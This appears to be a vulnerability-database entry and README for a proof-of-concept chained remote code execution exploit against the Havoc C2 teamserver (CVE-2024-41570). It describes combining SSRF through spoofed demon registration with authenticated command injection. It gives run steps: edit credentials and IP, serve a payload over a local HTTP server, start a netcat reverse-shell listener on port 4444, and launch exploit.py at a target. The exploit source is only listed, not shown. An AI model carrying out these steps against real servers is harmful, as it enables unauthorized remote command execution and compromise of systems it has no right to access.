PoC details: 1c6b477c65fbf2895dd56a18f195853198f7f152

Source
Related vulnerability
Title: Havoc security vulnerability (CVE-2024-41570)
Description: Havoc is a modern and extensible post-exploitation command and control framework open-sourced by Havoc Framework. Havoc 2 0.7 contains a security vulnerability caused by an unauthenticated server-side request forgery (SSRF) in the demon callback handling, which allows an attacker to send arbitrary network traffic originating from the teamserver.
Description
This is a chained RCE in the Havoc C2 framework using the github.com/chebuya and github.com/IncludeSecurity PoCs
Introduction
# Havoc-C2-RCE (CVE-2024-41570)
This is a Chained RCE (CVE-2024-41570) in the Havoc C2 framework.

Command injection: Havoc is vulnerable to command injection enabling an authenticated user to execute commands on the Teamserver. Affects versions 0.3 up to the latest release 0.6. Havoc's default profile contains hardcoded passwords, so a C2 operator careless enough to use the default profile on a public network can immediately be exploited.

SSRF: This vulnerability is exploited by spoofing a demon agent registration and its check-ins to open a TCP socket on the teamserver and read/write data through it. This allows attackers to leak the origin IPs of teamservers and much more.

Chain: Abusing SSRF to deliver an authenticated command injection payload.

# How to use
![2025-01-19 20-01-34](https://github.com/user-attachments/assets/e57accee-6d1e-4633-aa32-a0ee07c42988)

```
1. Modify the IP, USER and PASSWORD in the exploit.py file.
2. Modify IP in payload.sh

-> python3 -m venv myenv && source myenv/bin/activate
-> pip3 install -r requirements.txt
-> chmod +x payload.sh
-> python3 -m http.server (On another terminal)
-> nc -lvnp 4444 (On another terminal)

# Run the exploit
(myenv) -> python3 exploit.py -t https://site.com -i 0.0.0.0 -p 12345
```

Credits to [@chebuya](https://github.com/chebuya/Havoc-C2-SSRF-poc) and [@Hyperreality](https://github.com/IncludeSecurity/c2-vulnerabilities/blob/main/havoc_auth_rce/havoc_rce.py)
File snapshot

```
[4.0K] /data/pocs/1c6b477c65fbf2895dd56a18f195853198f7f152
├── [9.8K] exploit.py
├── [  64] payload.sh
├── [1.4K] README.md
└── [  43] requirements.txt

0 directories, 4 files
```